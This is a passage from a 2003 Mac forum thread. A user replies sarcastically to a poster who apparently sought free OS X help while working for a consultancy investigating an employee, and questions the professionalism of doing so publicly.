"Do not be too positive about things. You may be in error." (C. F. Lawlor, The Mixicologist)
     
brainchild2b  (op)
Grizzled Veteran
Join Date: Sep 2000
Location: The Basement
Status: Offline
Aug 5, 2003, 08:10 PM
 
I posted here because I'm not concerned about the user reading these forums. It needed help with OS X enough that I posted at a public forum.
     
talisker
Mac Elite
Join Date: Oct 2001
Location: Edinburgh
Status: Offline
Aug 6, 2003, 12:51 AM
 
Originally posted by brainchild2b:
I posted here because I'm not concerned about the user reading these forums. It needed help with OS X enough that I posted at a public forum.
So let's get this straight - you work for a professional consultancy firm helping a company to investigate an employee. As such your company will presumably be making some money. And you come here expecting people to give you free advice without demanding some of the profit? And they give it to you? Wow.

The most professional thing would be to tell everyone the name of your company and put this on a more above board commercial business. I can't possibly see how that could compromise your position in any way.
     
 
 